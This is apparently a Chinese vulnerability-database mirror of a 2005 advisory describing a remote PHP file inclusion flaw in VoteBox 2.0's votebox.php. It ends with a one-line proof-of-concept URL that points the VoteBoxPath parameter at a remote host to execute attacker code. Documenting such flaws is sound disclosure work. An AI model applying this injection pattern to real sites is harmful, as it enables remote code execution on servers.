VoteBox 2.0 – ‘Votebox.php’ Remote File Inclusion

11次阅读
没有评论

VoteBox 2.0 – ‘Votebox.php’ Remote File Inclusion

漏洞ID 1054964 漏洞类型
发布时间 2005-03-14 更新时间 2005-03-14
VoteBox 2.0 - 'Votebox.php' Remote File InclusionCVE编号 N/A
VoteBox 2.0 - 'Votebox.php' Remote File InclusionCNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/25226
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/12806/info

It is reported that VoteBox is affected by a remote PHP file include vulnerability. This issue is due in part to the application failing to properly sanitize user-supplied input to the 'votebox.php' script.

Remote attackers could potentially exploit this issue to include and execute a remote malicious PHP script.

This issue reportedly affects VoteBox version 2.0, previous versions might also be affected. 

www.example.com/votebox.php?VoteBoxPath=http://[CMD]

相关推荐: Macromedia Flash Player Unspecified Buffer Overflow Vulnerability

Macromedia Flash Player Unspecified Buffer Overflow Vulnerability 漏洞ID 1100748 漏洞类型 Boundary Condition Error 发布时间 2003-03-04 更新时间 …

正文完
 0